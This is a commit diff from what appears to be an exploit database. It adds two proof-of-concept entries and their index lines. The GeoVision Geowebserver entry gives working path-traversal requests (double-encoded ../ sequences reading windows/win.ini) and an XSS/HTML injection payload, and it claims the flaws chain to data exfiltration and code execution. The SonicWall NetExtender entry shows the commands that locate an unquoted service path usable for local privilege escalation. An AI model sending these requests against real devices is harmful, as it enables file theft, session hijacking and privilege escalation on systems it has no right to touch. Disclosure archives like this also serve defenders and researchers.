DB: 2021-08-18

2 changes to exploits/shellcodes SonicWall NetExtender 10.2.0.300 - Unquoted Service Path GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
2021-08-18 05:01:56 +00:00 · 2021-08-18 05:01:56 +00:00 · 0105a5abef
commit 0105a5abef
parent dc3bff8caf
3 changed files with 95 additions and 0 deletions
--- a/exploits/hardware/webapps/50211.txt
+++ b/exploits/hardware/webapps/50211.txt
@ -0,0 +1,37 @@
+# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
+# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
+# Date: 6-16-21 (Vendor Notified)
+# Exploit Author: Ken 's1ngular1ty' Pyle
+# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
+# Version: <= 5.3.3
+# Tested on: Windows 20XX / MULTIPLE
+# CVE : https://www.geovision.com.tw/cyber_security.php
+
+GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:
+
+Nested Exploitation of the LFI, XSS, HTML / Browser Injection:
+
+GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1
+
+Absolute exploitation of the LFI:
+
+POST /Visitor/bin/WebStrings.srf?obj_name=win.ini
+
+GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini
+
+Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.
+
+
+ex. obj_name=INJECTEDHTML / XSS
+
+The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors:
+
+ex. /Visitor//%252e(path to target)
+
+These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:
+
+The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.
+
+These attacks were disclosed as part of the IOTVillage Presentation:
+
+ https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4
--- a/exploits/windows/local/50212.txt
+++ b/exploits/windows/local/50212.txt
@ -0,0 +1,56 @@
+# Exploit Title: SonicWall NetExtender 10.2.0.300 -  Unquoted Service Path
+# Exploit Author: shinnai
+# Software Link: https://www.sonicwall.com/products/remote-access/vpn-clients/
+# Version: 10.2.0.300
+# Tested On: Windows
+# CVE: CVE-2020-5147
+
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+Title: SonicWall NetExtender windows client unquoted service path 
+vulnerability
+Vers.: 10.2.0.300
+Down.: https://www.sonicwall.com/products/remote-access/vpn-clients/
+
+Advisory: 
+https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0023
+CVE ID: CVE-2020-5147 (https://nvd.nist.gov/vuln/detail/CVE-2020-5147)
+
+URLs:
+https://besteffortteam.it/sonicwall-netextender-windows-client-unquoted-service-path-vulnerability/
+https://shinnai.altervista.org/exploits/SH-029-20210109.html
+
+Desc.:
+SonicWall NetExtender Windows client vulnerable to unquoted service path 
+vulnerability, this allows a local attacker to gain elevated privileges 
+in the host operating system.
+This vulnerability impact SonicWall NetExtender Windows client version 
+10.2.300 and earlier.
+
+Poc:
+
+C:\>sc qc sonicwall_client_protection_svc
+[SC] QueryServiceConfig OPERAZIONI RIUSCITE
+NOME_SERVIZIO: sonicwall_client_protection_svc
+         TIPO                      : 10  WIN32_OWN_PROCESS
+         TIPO_AVVIO                : 2   AUTO_START
+         CONTROLLO_ERRORE          : 1   NORMAL
+         NOME_PERCORSO_BINARIO     : C:\Program Files\SonicWall\Client 
+Protection Service\SonicWallClientProtectionService.exe <-- Unquoted 
+Service Path Vulnerability
+         GRUPPO_ORDINE_CARICAMENTO :
+         TAG                       : 0
+         NOME_VISUALIZZATO         : SonicWall Client Protection Service
+         DIPENDENZE                :
+         SERVICE_START_NAME : LocalSystem
+C:\>
+
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i 
+"auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+SonicWall Client Protection Service                              
+sonicwall_client_protection_svc  C:\Program Files\SonicWall\Client 
+Protection Service\SonicWallClientProtectionService.exe      Auto
+
+C:\>
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11379,6 +11379,7 @@ id,file,description,date,author,type,platform,port
 50135,exploits/linux/local/50135.c,"Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation",2021-07-15,TheFloW,local,linux,
 50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",2021-08-10,"Andrea Intilangelo",local,windows,
 50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",2021-08-10,"Vishwaraj Bhattrai",local,android,
+50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 -  Unquoted Service Path",2021-08-17,shinnai,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -44337,3 +44338,4 @@ id,file,description,date,author,type,platform,port
 50208,exploits/hardware/webapps/50208.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure",2021-08-16,LiquidWorm,webapps,hardware,
 50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",2021-08-16,LiquidWorm,webapps,hardware,
 50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",2021-08-16,LiquidWorm,webapps,hardware,
+50211,exploits/hardware/webapps/50211.txt,"GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE",2021-08-17,"Ken Pyle",webapps,hardware,